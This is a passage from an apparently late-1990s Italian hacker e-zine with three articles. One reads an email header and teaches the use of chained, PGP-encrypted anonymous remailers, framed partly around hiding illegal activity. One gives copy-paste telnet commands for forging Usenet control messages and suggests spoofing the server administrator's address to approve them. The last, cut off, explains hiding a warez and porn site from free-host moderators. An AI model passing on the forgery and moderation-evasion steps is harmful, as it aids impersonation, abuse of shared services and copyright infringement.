credito heheheh :) come vedete una normale mail è......Come dire......Poco anonima, abbiamo
davvero tutti i dati che ci servono per rintracciare il mittente, eccovi adesso un header di
una mail speditami al mio mail-forward cioè UIC@mail.usa.com <mailto:UIC@mail.usa.com>, il 
viaggio in pratica è stato: client del mittente-server del mail_forward-mio server: 
Return-Path: <Mittente@tin.it> 
Received: from smv03.iname.net ;Mail proveniente dal server smv03.iname.net 
([165.251.8.81]) by fep02-svc.tin.it ;IP del server iname e host del server che ha ricevuto 
la lettera 
(InterMail v4.0 201-221-105) with SMTP ;Versione del programm usato dal server e specifica 
che è stato usato un serve di posta in uscita SMTP 
id <19990707222017.BWVK28793.fep02-svc@smv03.iname.net>;Anno, mese..... insomma l'avete 
capito e host del server iname che ha ricevuto la mail 
for <Me@tin.it>; Thu, 8 Jul 1999 00:20:17 +0200;Indirizzo del destinatario + giorno anno 
ecc..... 
Return-Path: <Mittente@tin.it>;Specifica il path di ritorno 
Received: from fep03-svc.tin.it (mta03-acc.tin.it [212.216.143.14]);Host e IP del server TIN
che ha ricevuto la lettera 
by smv03.iname.net (8.9.3/8.9.1SMV2) with ESMTP id SAA12765;Lettera ricevuta dal server 
smv.iname.net e l'ID 
for <uic@mail.usa.com> sent by <Mittente@tin.it>; Wed, 7 Jul 1999 18:20:14 -0400 (EDT);
Mail per UIC@mail.usa.com <mailto:UIC@mail.usa.com> spedita da Mittente@in.it nella tal data
ora anno e minuto.... 
Received: from oemcomputer ([212.216.140.150]) by fep03-svc.tin.it 
(InterMail v4.0 201-221-105) with SMTP;Ricevuta da un oemcomputer+IP dal server fep03-svc...
Che ha usato tale programma e un server SMTP 
id <19990707221943.NUHX20919.fep03-svc@oemcomputer>;Qui la mail viene rispedita verso di me 
for <uic@mail.usa.com>; Thu, 8 Jul 1999 00:19:43 +0200 
Message-ID: <000801bec8c6$b1e669e0$fabed8d4@oemcomputer> 
From: "Mittente" <Mittente@tin.it> 
To: "Quequero" <uic@mail.usa.com> 
Subject: Mi serve una mano!!! 
Date: Thu, 8 Jul 1999 00:18:45 +0200 
MIME-Version: 1.0 
Content-Type: multipart/alternative; 
boundary="----=_NextPart_000_0005_01BEC8D7.71788440" 
X-Priority: 3 
X-MSMail-Priority: Normal 
X-Mailer: Microsoft Outlook Express 5.00.2014.211 ;Programma usato dal mittente per mandare 
la lettera 
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211 
This is a multi-part message in MIME format. 
------=_NextPart_000_0005_01BEC8D7.71788440 
Content-Type: text/plain; 
charset="iso-8859-1" 
Non preoccupatevi se siete confusi perchè vi rispiego un po' meglio com'è andata la storia: 
Mittente ha scritto una mail con Microsoft Outlook Express 5.00.2014.211 e l'ha inviata 
a UIC@mail.usa.com <mailto:UIC@mail.usa.com>, la lettera è inizialmente entrata nel server 
fep02-svc.tin.it che a sua volta l'ha rinviata a smv03.iname.net che l'ha poi rispedita 
secondo un ID che aveva in memoria a fep03-svc.tin.it dal quale l'ho poi ricevuta io, 
semplice no? ;) 
Ok nonostante il mail-forward se qualcuno mi tenesse sott'occhio portebbe innanzitutto 
leggere la mia posta in uscita, oppure potrebbe con un po di lavoro risalire dall'id che 
ho suul server smv03.iname.net al mio vero indirizzo, il problema è che comunque non posso 
rispedire la mia mail da casa (altrimenti il ricevente vedrebbe il mio indirizzo) e mi 
dovrei avvalere di un servizio di posta anonima come freemail, yahoo ecc.....
Ok l'altra soluzione sarebbe quella di usare un servizio di posta anonima sia per la posta 
in entrata che in uscita ma come tutti sapete non è granchè comodo (e poi questi servizi 
sono come ICQ, conoscono sempre il vostro IP e potete per questo essere facilmente tracciati),
ci possiamo quindi avvalere ad un comodissimo mail-forward per la posta in entrata e ad un 
remailer per quella in uscita giusto? Credo sia la combinazione migliore. Andiamo quindi a 
vedere dopo questo lungo preambolo cosa sono questi i famigerati remailer. Un remailer non 
è altro che un server che serve a ricevere una mail ed a rimandarla all'apposito destinatario, 
l'ulteriore vantaggio è che i remailer oltre che offrire anonimato ci regalano anche sicurezza 
dal momento che usandoli in un certo modo possiamo mantenere un anonimato totale, i remailer 
si dividono in 3 tipi, Pseudo-Anonymous, CypherPunk e MixMaster, iniziamo a descriverne i vari 
tipi. 
Pseudo-Anonymous 
Questi remailer (detti anche di tipo 0) sono ormai antiquati e non danno un grande anonimato, 
il loro modo di agire è questo: in pratica ogni volta che mandate ad uno di questi remailer 
(per esempio: anon@anon.penet.fi) loro vi forniscono un ID casuale e strippano le informazioni 
nell'header sostituendole con questo ID, il destinatario per rispondervi non dovrà fare altro 
che usare il famoso reply-to per rispondervi, il server allora riconoscerà quell'ID e vi 
rimanderà la mail, il problema è che gli operatori ed il server stesso conoscono il vostro 
vero indirizzo e quindi potrebbero essere corrotti a diffondere degli indirizzi, o peggio 
un hacker potrebbe trovare tutti i vostri dati oppure come successe per anon.penet.fi il 
padrone del serve potrebbe essere costretto a dover rivelare il proprio archivio per 
consegnare prove algli agenti di stato eccetera, vi consiglio di usare questo tipo di remailer
solo se non avete bisogno di un livello estremamente alto di anonimità, certo che se siete 
hacker, reverser o comunque fate cose illegali allora gli Pseudo-Anonymous non sono indicati 
infatti mantengono i log, non permettono di concatenare vari remailer tra loro e neanche 
accettano mail crittate, l'operatore potrebbe quindi leggersi come e quando vuole la vostra 
mail. 
CypherPunk 
I remailer CypherPunk (detti di Tipo 1) sono estremamente più sicuri dei precedenti per il 
semplice fatto che ci offrono svariate chicche che possono farci sempre comodo e queste sono: 
1) Accettano la posta crittata 
2) Ci consentono di creare un latency time prima del rinvio 
3) Abbiamo la possibilità di concatenare più remailer tra loro 
4) Utilizzano un riordinamento casuale dei messaggi 
Dunque i più esperti sostengono che per ottenere livelli di sicurezza praticamente assoluti 
si devono concatenare almeno tre remailer, prima di tutto dobbiamo trovare un remailer e per 
questo dovete visitare il sito: http://anon.efga.org/~rlist/rlist.html dovete farlo perchè 
i remailer dal momento che non producono entrate vanno e vengono, possono durare anni oppure 
restare on-line un solo mese o meno, ok appena avrete il remailer aprite il vostro client di 
posta e mettete come indirizzo quello del remailer ad esempio: remailer@flame.alias.net poi 
come soggetto quello che volete ed infine potete scrivere la lettera ma con un criterio 
standard ossia, prima di mandare il messaggio dovete inserire una riga contenete solo una 
coppia di due punti (::) poi lasciare una riga, scrivere una riga con: 
Request-Remailing-To: destinatario, di nuovo una riga bianca e poi la lettera, ecco come: 
A: remailer@flame.alias.net 
Soggetto: quello che più ti garba 
---------------------------------------- 
:: 
Request-Remailing-To: destinatario@tin.it 
Ciao, 
questa è una stupida prova per imparare ad usare un remailer 
------------------------------------------------------------------------ 
Ok adesso non vi resta che inviare la mail ed aspettare che arrivi, nonostante tutto il 
vostro anonimato non è coperto totalmente quindi non potete minacciare Clinton :), quindi 
la lettera arriverà al remailer che a sua volta lo rimanderà a Destinatario@tin.it, ok 
adesso per coprire un po' di più il vostro messaggio potete crittarlo col PGP, per prima 
cosa dovete ottenere la chiave pubblica del vostro remailer, per farlo mandate una mail 
vuota con soggetto: remailer-help al vostro remailer e dopo pochi secondi avrete finalmente 
tutte le info sul remailer e la sua chiave pubblica, prendete il messaggio: 
:: 
Request-Remailing-To: Destinatario@tin.it 
Ciao, 
questa è una stupida prova per imparare ad usare un remailer. 
crittatelo usando l'opzione Text Output se avete PGP 6 o superiore: 
-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 6.0.2i
hQCMA98tceHEP7bpAQP/aIgwnTmh73X0M1KTMRXLtOeG8qCm1ejQwBTXnJ7NJrS3
qsY4GZTyHmy86U17XRay1nM2GC6eCv81EuZsejQolG4P7kxTX1Ywl2PuPceZPQ3m
JkEbhcNNXIgXqWkc1p/ahb9AnJ08hdi9J+FBcjiI5wUDffaOOSNkOuUoKPhjKTyk
kybbDH8B9GWNd0ruHxQDESWqFDlI2c3naYyxyErH8Kww3NbPjCYcZ07UfxE7LEr9
/gU2hPvOYpj49h6Nm3rRVlS9Kqve9Yr5D6PNxbsP1ege4CMO7uJXG0+r+PdEhZ1R
3CbQOlDANpsmhFVzbxN3bHB/CLFzVg16QrFceYPsO4OZpENAU0Eb3tYv1LRlGn2U
lIhzdQ==
=D7/d
-----END PGP MESSAGE----- 
Ok adesso avete crittato con la chiave pubblica del server, adesso però dovete spedire la 
mail e come fate? Aprite un nuovo messaggio a fate così: 
:: 
Request-Remailing-To: destinatario@tin.it 
::
Encrypted: PGP 
-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 6.0.2i
hQCMA98tceHEP7bpAQP/aIgwnTmh73X0M1KTMRXLtOeG8qCm1ejQwBTXnJ7NJrS3
qsY4GZTyHmy86U17XRay1nM2GC6eCv81EuZsejQolG4P7kxTX1Ywl2PuPceZPQ3m
JkEbhcNNXIgXqWkc1p/ahb9AnJ08hdi9J+FBcjiI5wUDffaOOSNkOuUoKPhjKTyk
kybbDH8B9GWNd0ruHxQDESWqFDlI2c3naYyxyErH8Kww3NbPjCYcZ07UfxE7LEr9
/gU2hPvOYpj49h6Nm3rRVlS9Kqve9Yr5D6PNxbsP1ege4CMO7uJXG0+r+PdEhZ1R
3CbQOlDANpsmhFVzbxN3bHB/CLFzVg16QrFceYPsO4OZpENAU0Eb3tYv1LRlGn2U
lIhzdQ==
=D7/d
-----END PGP MESSAGE----- 
e la spedite, non dovete fa altro in pratica che aggiungere un'altra volta i due punti e poi 
la stringa Encrypted:PGP che serve a dire al remailer che gli state mandando un messaggio 
crittato (ovviamente dovete mettere nel campo "A:" l'indirizzo del vostro remailer), vi 
starete chiedendo come fa il server a rimandare la lettera se non può leggere il messaggio, 
ma è ovvio, siccome abbimao crittato il testo con la sua chiave pubblica lui non fa altro 
che decrittare il tutto e leggerlo con comodo :) 
Il vostro anonimato a questo punto è già più coperto ma neanche troppo dal momento che il 
vostro remailer conosce sia il mittente che il destinatario e quindi un eventuale controllo 
potrebbe smascherarvi, per ovviare a questo problema potete concatenare due o più remailer, 
farlo è estremamente facile ed ora ve ne mostrerò il modo: si riempiono i consueti campi 
"A:" "Subject:" ecc...Poi nel corpo della lettera si inseriscono tanti "Request-Remailing-To:"
quanti sono i remailer che volete usare e poi come all'ultimo "Request-Remailing-To:" 
inserite il vostro destinatario, ecco il solito esempio: 
A: remailer@flame.alias.net 
Soggetto: Prova di concatenazione remailer 
----------------------------------------------------- 
:: 
Request-Remailing-To: remailer@base.xs4all.nl 
:: 
Request-Remailing-To: blackbird@cpis.net 
:: 
Request-Remailing-To: bluebox@phreaker.net 
:: 
Request-Remailing-To: cannabis.anon@hotpop.com 
:: 
Request-Remailing-To: destinatario@tin.it 
Ciao, 
questa è una stupida prova per imparare ad usare una catena di remailer. 
A questo punto dovreste aver capito che il primo remailer (remailer@flame.alias.net) prende 
la mail le cambia l'header e la rispedisce al secondo che cambia l'header e rinvia il tutto 
al terzo e così via fino al destinatario che così saprà solo che la lettera proviene 
dall'ultimo remailer, quindi da questo punto di vista l'anonimità è assicurata, è protetta 
anche da eventuali supervisori perchè ad ogni modo non potrebbero rintracciarla infatti il 
primo remailer conosce il mandante e l'indirizzo del secondo remailer ma non il destinatario 
effettivo, il secondo remailer non conosce nè il mittente nè il destinatario effettivo, il 
terzo e così via, poi l'ultimo remailer conosce solo il destinatario ma non sa un ciufolo del
mittente quindi non ci sono problemi...Se se, vi credete voi, i problemi ci sono e come 
infatti la mail non è crittata quindi qualunque coglione potrebbe leggerla :), ok avrete 
capito che adesso parleremo di remailer concatenati e mail crittate...Hehehehehe 
GnGnGnGnGnGnGnGn (leggasi come una sghignazzata con la gn di gnomo :). 
Adesso proviamo a crittare una mail, prima di tutto vi devo dire il meccanismo: scaricate 
la chiave di ogni singolo remailer, scrivete il messaggio comprensivo dei due punti e della 
stringa "Encrypted:PGP" e con tutto il testo PGPiatelo con la chiave dell'ULTIMO remailer: 
lettera originale: 
:: 
Request-Remailing-To: destinatario@tin.it 
Ciao, 
questa è una stupida prova per imparare ad usare una catena di remailer. 
PGPiatela con la chiave di cannabis.anon@hotpop.com e l'opzione Text Output per versione 6 
o superiori del PGP, insomma se c'avete quell'opzione attivatela: 
-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 6.0.2i
hQCJAz0VsrLnrsHlAQPopF2nZixPMShNo/+6e4KlYKB0/XO+LiSTXVa2cg8tRU8o
dKkQNWf+yM3EAnnW3q9vyorxN0z1SQEvMHW8V+j81jP9MvXvAhg/uL7r89PIbyk/
lxxSp8s+ATIRJKJDsBv9DJN653pX4pdKuQJ2OpwEt4tlr69+yskSxH2IwdGkil6H
lqDvo+hvAidV61TAeGK9RfiuP0HSQI6MfRl7qbsRyfQ5Hjj9VA0/MX8eKRH65gWv
W03FNzwcSs9byfaeiL5K4AyBS1vzQ/0167uw5xl7eFcHPTDN+q2lCtFL+kxz0keN
+46/aa6q0ZIK3Q6LSIG9NfbDU3t09BcUJfSa7RIvHHI0WdlwVNQs+g==
=acxg
-----END PGP MESSAGE----- 
OKi, aggiungete le solite stringhe e rimettete il testo: 
:: 
Request-Remailing-To: bluebox@phreaker.net 
:: 
Encrypted:PGP 
-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 6.0.2i
hQCJAz0VsrLnrsHlAQPopF2nZixPMShNo/+6e4KlYKB0/XO+LiSTXVa2cg8tRU8o
dKkQNWf+yM3EAnnW3q9vyorxN0z1SQEvMHW8V+j81jP9MvXvAhg/uL7r89PIbyk/
lxxSp8s+ATIRJKJDsBv9DJN653pX4pdKuQJ2OpwEt4tlr69+yskSxH2IwdGkil6H
lqDvo+hvAidV61TAeGK9RfiuP0HSQI6MfRl7qbsRyfQ5Hjj9VA0/MX8eKRH65gWv
W03FNzwcSs9byfaeiL5K4AyBS1vzQ/0167uw5xl7eFcHPTDN+q2lCtFL+kxz0keN
+46/aa6q0ZIK3Q6LSIG9NfbDU3t09BcUJfSa7RIvHHI0WdlwVNQs+g==
=acxg
-----END PGP MESSAGE----- 
A questo punto crittate il tutto con la chiave del remailer precedente e così via fino 
alla fine, in pratica dopo questo giro il primo remailer riceverà la lettera comprensiva 
della stringa "Encrypted:PGP" lo decritterà con la sua chiave e lo spedirà al secondo 
remailer, quest'ultimo lo decritterà con la sua chiave e lo riinvierà al terzo, dopo tutto
il processo destinatario@tin.it riceverà la lettera in chiaro e la potrà vedere, se poi 
crittate anche il messaggio con la chiave di destinatario lui riceverà la lettera PGPata, 
la decritterà e leggerà il vostro messaggio, a questo punto neanche Dio riuscirà a scoprire 
da chi proviene la lettera e state pur certi che nessuno riuscirà neanche a leggerla durante 
il percorso, parliamo adesso di alcune opzioncine che possiamo usare per mandare con più 
sicurezza una mail. Raga se proprio avete i servizi segreti alle calcagna e neanche 4 remailer
vi riescono a coprire le spalle, oppure sotto casa girano degli agenti con degli strani 
apparecchietti con su scritto TEMPEST allora vi hanno fregato e non potete far altro che 
fuggire in un paese senza estradizione, ma comunque non vi servirebbe a molto, però se tutto 
questo ancora non fosse successo allora potreste proteggere un po' meglio la vostra privacy. 
Adesso starete dicendo: "Perchè dopo tutto sto' poema esiste un modo più sicuro per 
proteggersi?" Bhè, più sicuro no però possiamo aggiungere qualche chicca alle nostre mail 
crittate o meno che siano, se non siete nei guai ma volete evitare il più possibile che il 
vostro indirizzo sia rintracciato allora vi potete avvalere di due comodi comandi che i 
remailer ci mettono a disposizione, questi sono: i Cutmarks, gli operatori per aggiungere 
header supplementari ed il tempo di latenza, vediamo subito come funzioano questi 
semplicissimi comandi: dunque i remailer a volte lasciano sul messaggio una firma con su 
scritto il loro indirizzo, se volete che nessuno sappia quali remailer sono stati usati 
nella catena allora dovete usare il comando "Cutmarks", questo comando vi fa scegliere dei
 simboli e dice al remailer di non visualizzare la riga precedente e le seguenti a quei 
simboli, vediamo un esempio: 
A: bluebox@phreaker.net 
Soggetto: Prova Cutmarks 
------------------------------------ 
:: 
Request-Remailing-To: destinatario@tin.it 
Cutmarks: !! 
Questa è la prova per capire come funzionano i Cutmarks 
Questa riga non sarà presente sul messaggio 
!! ;Ecco i Cutmarks 
Questa riga non sarà presente sul messaggio 
Nè tantomeno ci saranno le prossime 
Avete capito come funzionano??? Se per esempio scrivete un messaggio di 30 righe e mettete 
i Cutmarks alla 20° riga allora la 19° non verrà visualizzata ma neanche tutte le righe dopo
la 20° ci saranno sul messaggio, ricordatevi solo che tra il request di remailing ed il 
comando Cutemarks non devono esserci spazi. Ok questo era facile adesso spieghiamo il 
funzionamento del comando ##, questo serve per inserire un header supplementare nella riga 
seguente al comando e si usa semplicemente così: 
A: bluebox@phreaker.net 
Soggetto: Prova Cutmarks 
------------------------------------ 
:: 
Request-Remailing-To: destinatario@tin.it 
## ;Dopo questa riga potete inserire un header supplementare 
Questa è la prova per capire come funziona il comando per l'header supplementare. 
Adesso parliamo del tempo di latenza, un signore che si chiama Cottrell aveva ipotizzato 
un modello di minaccia piuttosto alto verso un determinato target, non vi sto a raccontare 
la storia perchè sarebbe troppo lunga, però supponeva in uno dei suoi punti che la maggior 
parte dei remailer fosse compromessa da agenzie governative ed altro e diceva che un buon 
metodo di difesa era appunto il tempo di latenza del messaggio, il vostro remailer vi mette 
a disposizione un comando: "Latent-Time:" che non serve ad altro che conservare per un 
determinato periodo il vostro messaggio nel server prima del rinvio, le sintassi a 
disposizione sono tre, vediamo come si usano e poi ve ne spiegherò come solito il significato: 
A: bluebox@phreaker.net 
Soggetto: Prova Cutmarks 
------------------------------------ 
:: 
Request-Remailing-To: destinatario@tin.it 
Latent-Time: 14.28 
Questa è la prova per capire come funziona il comando Latent-Time. 
---------------------------------------------------------------------------- 
A: bluebox@phreaker.net 
Soggetto: Prova Cutmarks 
------------------------------------ 
:: 
Request-Remailing-To: destinatario@tin.it 
Latent-Time: +8:30 
Questa è la prova per capire come funziona il comando Latent-Time. 
---------------------------------------------------------------------------- 
A: bluebox@phreaker.net 
Soggetto: Prova Cutmarks 
------------------------------------ 
:: 
Request-Remailing-To: destinatario@tin.it 
Latent-Time: +14:20r 
Questa è la prova per capire come funziona il comando Latent-Time. 
Nel primo messaggio vediamo che dopo il comando Latent-Time (attenti all'assenza di riga 
bianca tra la richiesta di remailing ed il comando di latenza) vediamo la scritta: 14:28, 
quello significa che il messaggio deve essere conservato nel server fino alle 14:28 locali, 
in pratica verrà rispedito poco prima delle due e mezza del pomeriggio, nel secondo caso 
c'è la scritta: +8:30, questo invece significa che il server deve far giacere il messaggio 
per 8 ore e 30 minuti mentre nell'ultimo caso vediamo: +14:20r, quella "r" dice al server 
che il messaggio deve restare nel server per un tempo CASUALE di massimo 14 ore e 20 minuti, 
c'è da notare anche che il tempo viene SEMPRE espresso in Ore e Minuti, viene usata la 
modalità 24h ed il ritardo massimo non può superare le 23 ore e 59 minuti. Oki, questa 
sezione è finita, parliamo ora dei remailer MixMaster. 
MixMaster 
I remailer MixMaster (tipo 2) sono considerati l'elite dei remailer, i più sicuri che 
esistano e questo perchè utilizzano particolari tecniche, dunque un server MixMaster 
critta il messaggio e concatena i remailer in modo automatico, utilizza diversi formati 
di crittazione come ad esempio RSAREF ma non PGP, una cosa che li rende molto robusti
dal punto di vista "spionistico" è che divide i messaggi in pacchetti di uguali dimensioni,
in tal modo rende inefficace lo spam-attack ipotizzato da Cottrell, in pratica un eventuale
unità governativa manderebbe al primo server della NOSTRA catena centinaia di messaggi di
diverse dimensioni, dimensioni che sono comunque note e annotate da qualche parte, poi 
farebbe un confronto e se trovasse un messaggio di dimensione non nota allora quello sarebbe
il nostro, quindi un attacco di questo genere sarebbe inefficace dal momento che i pacchetti
sono tutti uguali, i pacchetti vengono crittati con un bel TripleDES (anche se a mio parere 
potevano usare un algoritmo diverso dal poco sicuro DES come ad esempio IDEA) ad ogni remailer
della catena, il messaggio sarebbe dunque crittato e nessuno potrebbe leggerlo (sono scettico
riguardo al TripleDES perchè è più veloce del DES ma meno sicuro e poi girano voci, 
probabilmente vere, che alcuni stati posseggano degli hardware speciali in grado di 
decrittare qualunque cosa crittata con questo algoritmo in pochi minuti, in pratica hanno 
delle specie di 3Dfx per la crittazione). Altra caratteristica di questi remailer è che 
rifiutano di rimandare un pacchetto già inviato, questo provedimento manderebbe a puttane 
un reply-attack, in pratica la solita associazion manda migliaia di messaggi insieme al 
nostro e poi li fa tornare indietro, se ne sono stati mandati 1000 e ne tornano 999 allora 
uno è andato per cazzi suoi ed è probabilmente il nostro, con questo procedimento su un 
remailer di tipo CypherPunk si può essere tracciato per intero il percorso del messaggio, 
su un server Mix ciò non succede perchè i pacchetti non possono tornare indietro e questo 
grazie ad una specie di ID digitale che il server riserva ad ogni pacchetto, poi questo 
tipo di server vanifica altri tipi di attacco grazie a quello che i radioamatori chiamerebbero
QRM cioè una specie di rumore di fondo, un po' come quello che sentono i radiotelescopi 
quando guardano lo spazio, i MixMaster possono essere concatenati con i CypherPunk ma sia 
con questo tipo di utilizzo sia con un tipo di utilizzo MixMaster-MixMaster necessitano di 
un software che si appoggia a Private Idaho, adesso vi starete chiedendo: "Cosa cavolo è 
Private Idaho?" Hehehe, questo è un meraviglioso programmino che si trova nella sezione 
Tools (http://quequero.cjb.net) di questo sito che serve a mandare messaggi crittati 
attraverso dei remailer senza fare quel bordello di cui vi parlavo, per usarlo dovete 
però avere un altro mini programma che trovate nella stessa sezione che si chiama Mixmaster, 
in pratica voi scegliete il remailer da una lista (per aggiornarla basta poi scaricarne una 
nuova dal link ad inizio articolo e semplicemente sostiruirla alla vecchia) scrivete il 
messaggio e poi ci pensa lui a mandarlo senza pensare ai due punti (::) e alle stringhe, 
vi critta il messaggio automaticamente se glielo dite e vi concatena anche i remailer se 
volete, in pratica fate quello che io ho impiegato 3 giorni per scrivere in uno o due secondi 
al massimo :) non vi ho accennato prima a questo programma perchè comunque dovete avere le 
basi per sapere ciò che state facendo. È finita???? Magariiiiiii, la regia mi impone di 
parlare del Reply-Block, oki, dai con ques'ultimo sforzo. Allora raga come abbiamo visto 
con questi cavolo di remailer c'èra un problema cioè: il rinvio della posta, insomma è 
inutile che mandavamo una lettera al nostro spacciatore di fiducia facendola passare sotto 
quindicimila remailer MixMaster se poi lui la rimandava a destinatario@tin.it, insomma, 
che kazzo stiamo a fa? L'arte dei pazzi!!! E no, allora l'unica soluzione possibile era: 
1) Farci rimandare la mail da una casella anonima (Freemail, Yahoo ecc...) ma a questo 
punto la posta la potevamo mandare e rimandare da li 
2) Mandare le lettere attraverso i soliti quindicimila remailer e poi farla tornare 
attraverso 12 mail-forward, ma in ogni caso i mail-forward non so' per niente anonimi 
3) Farsi un reply block...Mmmm ma che è sto reply block? 
Bhè non è niente più che il nostro indirizzo di posta crittato con la chiave del remailer,
mi spiego meglio: chi l'ha detto che dobbiamo crittare un messaggio per non farlo leggere 
ai curiosi e che non lo possiamo invece crittare per non farlo leggere al destinatario???
Nessuno allora fate una mini lettera di questo genere: 
--------------------- 
:: 
Request-Remailing-To: Mittente@tin.it 
----------------------------
Quequero





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-




				COME CREARE UN NEWSGROUP: by BoBo


Salve a tutti, è la prima volta che scrivo in una e-zines e sono molto felice di farlo
insieme a Zio Marzo, cmq dato che all'e-mail di attila_hack sono arrivate tante richieste
su come creare un newsgroup, ho deciso di spiegarlo per (speriamo) :) l'ultima volta. 
1-Ci si collega alla porta 119 con telnet e si inseriscono questi comandi:
post
From: attila_hack@hotmail.com
Subject: cmsg newgroup alt.hackers.attila_hack
Control: newgroup alt.hackers.attila_hack
Newsgroups:  alt.hackers.cough.cough.cough      // Newsgroups: va scritto in questo
                                                // campo il nome di un ng qualsiasi
                               			// basta che sia presente sul server news 
                                                // dove vuoi creare il nuovo Newsgroup,
                                                // tanto poi l'articolo stesso non viene
                                                // pubblicato.
Approved: attila_hk@hotmail.com			// Credo che per essere moderatori basti
                                                // solamente aggiungere la linea Moderator
                                                // accanto a questo indirizzo e-mail.   
                                                //qui ci vanno due righe bianche                                     alt.hackers.attila_hack In questo newsgroups si discute di Hacking - Cracking e Phreacking Attila_Hack Site Official: http:\\attila_hack.cjb.net Attila_Hack e-mail: attila_hack@hotmail.com
						//Infine, quest'ultimo spazio è dedicato al manifesto
                                    // del nuovo NG
.
						//Il punto serve a terminare il POST

N.B.1  Per Controllare l'avvenuta richiesta di creare un Newsgroup andare al newsgroup:
       control-newgroup per altri dettagli newzbot (DB dove puoi ricercare ad esempio
       tutti i news servers su i quali appare un determinato newsgroup e anche altre
       cose...) : http://www.jammed.com/~newzbot/
N.B.2  Se vuoi fare il moderatore del tuo ng invece devi aggiungere la linea Moderator
       (penso nella riga approved) con la        sintassi che segue come da RFC relativo.
N.B.3  E' meglio se l'indirizzo sotto approved e' diverso da quello del from, infatti,
       è molto probabile che un robot verificatore controlli almeno l'esistenza degli
       indirizzi mail e dei moderatori citati negli approved.
N.B.4  Il tempo che passa prima di vedere il nuovo Newsgroup messo on-line, dipende da
       tantissime cose e varia da un mese ad un giorno cmq affidandosi alla Tin, piuttosto
       che ad interbusiness ed a Tiscali dovrebbe accellerare la cosa.
N.B.5  Per rimuovere un newsgroup (per esempio alt.lamer) bisogna invece utilizzare: 
       rmgroup alt.nomegruppo (come sempre, utilizzando Subject, Control, Approved ecc..).
       Questo comando, pero`, non viene gestito quasi mai in maniera automatica, ma passa
       per le mani dell'Amministratore, che puo` decidere di non permetterne l'esecuzione.
       Nel caso di newgroup e (soprattutto) rmgroup e` molto utile utilizzare come From e
       Approved l'indirizzo email dell'Amministratore. :-DDeeehhheiiiiieuuhheiiiuu
ECCO QUI IL TUTTO SENZA COMMENTO (basta fare copia e incolla e cambiare le info
essenziali:from... control.. subject... ecc..) RICORDATI DI COLLEGARTI ALLA PORTA DEL
SERVER NEWS per inviare questi dati(AD ESEMPIO: news.tin.it), porta 119:
post
From: attila_hack@hotmail.com
Subject: cmsg newgroup alt.hackers.attila_hack
Control: newgroup alt.hackers.attila_hack
Newsgroups:  alt.hackers.cough.cough.cough
Approved: attila_hk@hotmail.com
alt.hackers.attila_hack In questo newsgroups si discute di Hacking - Cracking e
Phreaking Attila_Hack Site Official: http:\\attila_hack.cjb.net Attila_Hack
e-mail: attila_hack@hotmail.com
.
-----------------Fine (spero di essere stato abbastanza esauriente :-))--------------------



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

			COME MANTENERE UN SITO WAREZ: By LiQUID 
'ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ"+- +- +- +- +- +- +- +- +- 
'º come mantenere siti warez   º-=-=-=-=-=-=-=-=-=-=-=-=-=-
'ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ"
                              °º Powered by [LiQUID]      º
Indice:                       ²ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ1/4
00 Indice ;)                  °º\            /       /$#@ ]
01 Disclaimer                 ²º \++++++++++/-------/ $#@ ]
02 Cosa vi serve              °º  \        /       /  $#@ ]
03 Teoria                     ²º   \      /\      /   $#@ ]
04 Come procedere             °º    \    /  \    /    $#@ ]
    ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿    ²º     \  /    \  /     $#@ ]
    ³ liquido@freemil.it ÃÄÄÄÄÄ1/4+-+-+-\/+-+-+-\/+-+-+-+#@ ]
    ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Disclaimer
Prima di iniziare vorrei dire che l'autore (io) non puo' essere coinvolto 
o ritenuto colpevole se succedesse qualcosa di ....strano ;) Inoltre non 
promette nulla riguardo il corretto funzionamento di questa semplice tecnica. 
Se pensate di essere coinvolti in qualsiasi maniera in brutte faccende 
leggendo il testo qui di seguito, fermatevi immediatamente e cancellate 
questo sporco pugno di bit dal vostro piccci! ;-P
Se per caso voi veniste coinvolti lo spirito di affrontare questa spiacevole
situazione e': 'Io non c'ero, non sono mai esistito, non ne ho la piu' pallida
idea di come quello sporco pugno di bit sia finito nel mio picci'!'
Questo Š un facile scherzetto che tutti che hanno almeno un minimo
di conoscenza in intenet riesce a fare :)
Cosa vi serve
- innanzitutto un sito (quello che dovete mettere e mantnere illegalmente);
- poi vi serve una mail anonima (come hotmail, freemail, ecc.);
- un secondo sito, pagina non troppo personale, e SENZA NULLA DI ILLEGALE
Teoria
Esistono certi servizi, meravigliosi, dove si da uno spazio web a disposizione
dei navigatori. Questi sono Xoom, Tripod, Geocities, Freeweb, ed altri ancora.
E' risaputo che questi sono moderati, cioŠ non ci si possono pizzare nŠ
immaginiporno, nŠ war-software, peccato :(((((
Ma noi con il nostro risaputo spirito anarchico non ci faremo di certo mettere
sotto da un cos piccolo problemuccio ;)
NON VOGLIAMO RINUNCIARE AL NOSTRO SITO WAREZ!!!!!!!!!!!!!!!!!!!!!!!!
Ecco come funziona la tecnica di controllo che i webmaster dei siti sopra
indicati usano per 'moderarci':
Esraggono a random (a caso) una pagina, e ne vanno a vedere l'indice,
MA SOLO QUELLO E LE PAGINE AD ESSO COLLEGATE!!!!
Come procedere
Noi ci faremo i nostri due set di pagine:
La prima warez e xxx, e la seconda innocente come un angioletto, con i nostri
hobby, qualche cazzatina varia, e qualche link, nulla di speciale. La
rinonimeremo come index.html (l'indice appunto). Poi uploderemo anche il
nostro sito warez, ma NESSUNA pagina collegher... questo col primo!
